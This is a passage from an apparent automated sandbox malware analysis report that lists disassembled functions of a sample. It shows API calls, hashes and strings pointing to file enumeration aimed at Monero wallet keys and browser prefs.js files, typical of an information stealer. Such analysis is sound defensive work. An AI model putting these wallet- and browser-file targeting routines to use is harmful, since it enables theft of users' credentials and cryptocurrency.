                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: fdf89ea1b96e8e5e2209eb3e8f319f14cd9474e821bfff380a3293859cb24beb
                  • Instruction ID: 251bcc3cba8a04cd9ee682d097dc2b0382ded0a4d9ba637ebdeffec0badc97b1
                  • Opcode Fuzzy Hash: fdf89ea1b96e8e5e2209eb3e8f319f14cd9474e821bfff380a3293859cb24beb
                  • Instruction Fuzzy Hash: 826112B1910218ABCB24EBA0DC45FEA737CBB88701F044598F609A7181EE75EB858F91
                  Function 00934570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00934580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00934587
                  • wsprintfA.USER32 ref: 009345A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 009345BD
                  • StrCmpCA.SHLWAPI(?,00940FC4), ref: 009345EB
                  • StrCmpCA.SHLWAPI(?,00940FC8), ref: 00934601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0093468B
                  • FindClose.KERNEL32(000000FF), ref: 009346A0
                  • lstrcat.KERNEL32(?,0105E730), ref: 009346C5
                  • lstrcat.KERNEL32(?,0105DAF8), ref: 009346D8
                  • lstrlen.KERNEL32(?), ref: 009346E5
                  • lstrlen.KERNEL32(?), ref: 009346F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 02b2020aae5a7f3bc26f27edfe46c5a3f3aa78cb4f5ddf259d6f879fc06db3ff
                  • Instruction ID: ed534c28a1aff7670ef7197b72e3cb11dd9a725ef90b46d66061527048def42b
                  • Opcode Fuzzy Hash: 02b2020aae5a7f3bc26f27edfe46c5a3f3aa78cb4f5ddf259d6f879fc06db3ff
                  • Instruction Fuzzy Hash: F3514A715502189BCB24EB70DC89FEE777CAB94700F404598F609A7191EF75EB848F91
                  Function 00933EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00933EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00933EDA
                  • StrCmpCA.SHLWAPI(?,00940FAC), ref: 00933F08
                  • StrCmpCA.SHLWAPI(?,00940FB0), ref: 00933F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0093406C
                  • FindClose.KERNEL32(000000FF), ref: 00934081
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 19339e2a9157e8b03ba6d499c1b1767551b2c696326572ba3ede0a99687fffc3
                  • Instruction ID: 41c174e06e8eef46c9dca72f613e5e0d868a5fc4421919276769e8e3cf3b1166
                  • Opcode Fuzzy Hash: 19339e2a9157e8b03ba6d499c1b1767551b2c696326572ba3ede0a99687fffc3
                  • Instruction Fuzzy Hash: 0C5115B5900218ABCB24EBB0DC85FEA737CBB94300F404598F65997180DF75EB858F95
                  Function 0092ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 0092ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 0092ED55
                  • StrCmpCA.SHLWAPI(?,00941538), ref: 0092EDAB
                  • StrCmpCA.SHLWAPI(?,0094153C), ref: 0092EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092F2AE
                  • FindClose.KERNEL32(000000FF), ref: 0092F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: feb214cab59eb70ee4d52d1e2460ab09303fa584fbfa2a03a81ee4cba8bab0c4
                  • Instruction ID: ee2f060bc2c029bf9818057c413013e7b60a9ba259f985f07235bb39504dccea
                  • Opcode Fuzzy Hash: feb214cab59eb70ee4d52d1e2460ab09303fa584fbfa2a03a81ee4cba8bab0c4
                  • Instruction Fuzzy Hash: 89E1C272911118AADB54FB60DC92FEE737CAF94300F4045E9B54A62092EF346F8ACF56
                  Function 00CE5B7A Relevance: 16.7, Strings: 12, Instructions: 1658COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #Y}$.{$@>$M[gz$TP1M$XKB$`Hr~$eX$r$fQW}$+7~$0o.$]~S
                  • API String ID: 0-3338583099
                  • Opcode ID: 430031bc61d8fb4261c36f8786ff51cafd4ec94452544d69f3e5432eb9babb03
                  • Instruction ID: e669a9f36fabde5581d40edb9681a4b86d60d2887a63f0cc02be824d78224e8a
                  • Opcode Fuzzy Hash: 430031bc61d8fb4261c36f8786ff51cafd4ec94452544d69f3e5432eb9babb03
                  • Instruction Fuzzy Hash: 7DB229F3A0C2049FE3046E2DEC8567ABBE5EF94320F1A493DEAC5C7740EA7558058697
                  Function 0092F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009415B8,00940D96), ref: 0092F71E
                  • StrCmpCA.SHLWAPI(?,009415BC), ref: 0092F76F
                  • StrCmpCA.SHLWAPI(?,009415C0), ref: 0092F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0092FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: e9ee448e40751af583d98d0a879157dc2d141578470407d118264e0d09162158
                  • Instruction ID: bbfdad0818441c128928076b44a1f77e3fa02f704b5abfac249b5db9c34b87ad
                  • Opcode Fuzzy Hash: e9ee448e40751af583d98d0a879157dc2d141578470407d118264e0d09162158
                  • Instruction Fuzzy Hash: EAB13E71900118ABDB24FB60DC96FEE7379AFD4300F4085A8E54A97195EF346B49CF92
                  Function 009216D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0094510C,?,?,?,009451B4,?,?,00000000,?,00000000), ref: 00921923
                  • StrCmpCA.SHLWAPI(?,0094525C), ref: 00921973
                  • StrCmpCA.SHLWAPI(?,00945304), ref: 00921989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00921D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00921DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00921E20
                  • FindClose.KERNEL32(000000FF), ref: 00921E32
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 68dca5ba7777e9d212e6e859396f33f404f6221852f2f0eea6bb8dc252ad169e
                  • Instruction ID: ab0b2bae9f502d8cda696402695492de3e301d30dcab4c14bd30db51228900b7
                  • Opcode Fuzzy Hash: 68dca5ba7777e9d212e6e859396f33f404f6221852f2f0eea6bb8dc252ad169e
                  • Instruction Fuzzy Hash: AB121271910118ABDB19FB60DC96FEE737CAF94300F414599B14AA6091EF706F89CFA2
                  Function 0092DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00940C2E), ref: 0092DE5E
                  • StrCmpCA.SHLWAPI(?,009414C8), ref: 0092DEAE
                  • StrCmpCA.SHLWAPI(?,009414CC), ref: 0092DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092E3E0
                  • FindClose.KERNEL32(000000FF), ref: 0092E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 74b8be297dfaa232f4914552eea390590d3d08478f983b709243fe215cef9ed2
                  • Instruction ID: 82f16b95504cd89654d64577e8b493f15f8beb8abcb6976ed1e4cc870d20941e
                  • Opcode Fuzzy Hash: 74b8be297dfaa232f4914552eea390590d3d08478f983b709243fe215cef9ed2
                  • Instruction Fuzzy Hash: D0F1BF71814118AADB19FB60DC96FEE7378BF94300F8041D9B54A62091EF346F8ACF66
                  Function 0092DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009414B0,00940C2A), ref: 0092DAEB
                  • StrCmpCA.SHLWAPI(?,009414B4), ref: 0092DB33
                  • StrCmpCA.SHLWAPI(?,009414B8), ref: 0092DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092DDCC
                  • FindClose.KERNEL32(000000FF), ref: 0092DDDE
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: c345f06d72d5a3566fa5e8fed77a98ff7d2c03132b723ef18d118ac5ef5bde7d
                  • Instruction ID: 0878d2f5e8656eceb84d17d753cc1d4aa87e004d51fe68e2a5b59f8a4347485c
                  • Opcode Fuzzy Hash: c345f06d72d5a3566fa5e8fed77a98ff7d2c03132b723ef18d118ac5ef5bde7d
                  • Instruction Fuzzy Hash: 67912172900114ABCB14FB70EC96EED737DAFD4300F408668F94A96195EE34AB598F93
                  Function 00CE7687 Relevance: 11.7, Strings: 8, Instructions: 1676COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
